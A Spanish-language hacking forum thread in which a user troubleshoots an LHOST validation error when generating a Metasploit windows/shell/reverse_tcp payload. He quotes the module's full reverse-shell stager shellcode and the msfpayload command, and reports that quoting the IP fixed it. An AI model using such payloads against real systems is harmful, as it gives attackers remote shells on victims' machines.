Foro de elhacker.net

Seguridad Informática => Hacking Ético => Mensaje iniciado por: Mister12 en 24 Mayo 2014, 20:35 pm



Título: (Solucionado) Como solucionar el error de validacion de Lhost en metasploit
Publicado por: Mister12 en 24 Mayo 2014, 20:35 pm
Estoy tratando de setear la Ip y el host de my payload en metasploit usando el windows/shell/reverse_tcp despues de ingresar

root@bt:~# msfpayload windows/shell/reverse_tcp LHOST=My ip
LPORT=4441 o

Me aparece este mensaje de error:

Error generating the payload: The following options failed to validate: LHOST

La traduccion seria error generando el payload : Las siguientes opciones fallaron al validar: LHOST

A que se deve esos mensajes de error y como solucionarlo?

Buscando en google encontre lo siguiente lo cual me hace pensar que con una midificacion en el codigo fuente de los payload se podria solucionar pero no soy experto en programacion y necesito de su ayuda

Esto fue lo que encontre:

Este es el codigo de un exploit recopilado


Si se deja el codigo como esta dara el error de validcion de LHOST

(http://htmlimg3.scribdassets.com/5k0o7jxd8g1wy0j7/images/10-273730f6ec.png)

Despues de corregir el codigo tendria que quedar haci

(http://htmlimg1.scribdassets.com/5k0o7jxd8g1wy0j7/images/11-bd98f14b7d.png)

El codigo del los payload de metasploit son como este

Citar
##
# $Id: reverse_tcp.rb 14774 2012-02-21 01:42:17Z rapid7 $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##


require 'msf/core'
require 'msf/core/handler/reverse_tcp'


module Metasploit3

   include Msf::Payload::Stager
   include Msf::Payload::Windows

   def initialize(info = {})
      super(merge_info(info,
         'Name'          => 'Reverse TCP Stager',
         'Version'       => '$Revision: 14774 $',
         'Description'   => 'Connect back to the attacker',
         'Author'        => ['hdm', 'skape', 'sf'],
         'License'       => MSF_LICENSE,
         'Platform'      => 'win',
         'Arch'          => ARCH_X86,
         'Handler'       => Msf::Handler::ReverseTcp,
         'Convention'    => 'sockedi',
         'Stager'        =>
            {
               'RequiresMidstager' => false,
               'Offsets' => { 'LHOST' => [ 197, 'ADDR' ], 'LPORT' => [ 204, 'n' ], 'ReverseConnectRetries' => [ 195, 'C'] },
               'Payload' =>
                  # Length: 290 bytes
                  "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
                  "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
                  "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
                  "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
                  "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
                  "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
                  "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
                  "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
                  "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
                  "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
                  "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
                  "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
                  "\xD5\x97\x6A\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6" +
                  "\x6A\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF" +
                  "\x4E\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56" +
                  "\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00" +
                  "\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56" +
                  "\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
                  "\xEC\xC3"
            }
         ))


   end

end                                                                                      

No tengo idea donde tendria que modificar


Título: Re: A que se deve este mensaje de error en matasploit al setear la IP y el Lport
Publicado por: nrzamel en 24 Mayo 2014, 21:22 pm
Disculpa le pones la palabra My ip o tu direccion de ip?


Título: Re: A que se deve este mensaje de error en matasploit al setear la IP y el Lport
Publicado por: Mister12 en 24 Mayo 2014, 21:58 pm
Disculpa le pones la palabra My ip o tu direccion de ip?

Obvio que mi dirección IP "lo de my ip solo lo escribí como ejemplo por no publicar mi ip en el foro"


Título: Re: A que se dede este mensaje de error en metasploit al setear la IP y el Lport
Publicado por: falc0n en 28 Mayo 2014, 20:42 pm
Parece un error al pardear tu dirección ip a cadena de texto, prueba a ponerla entre comillas dobles


Título: Re: Como solucionar el error de validacion de Lhost en metasploit
Publicado por: Mister12 en 31 Mayo 2014, 18:57 pm
Hice lo que me indicaste y siempre me da el error de validación de LHOST, estudiando el lenguaje de programación Ruby he solucionado el problema, para que la Ip sea validada en LHOST se debe de escribir así ejemplo "LHOST=192.166.43.1" de igual forma en LPORT en la mayoría de tutorial solo dan ejemplos de esta forma,  LHOST=192.166.43.1 y debe de ser como lo explique en el primer ejemplo.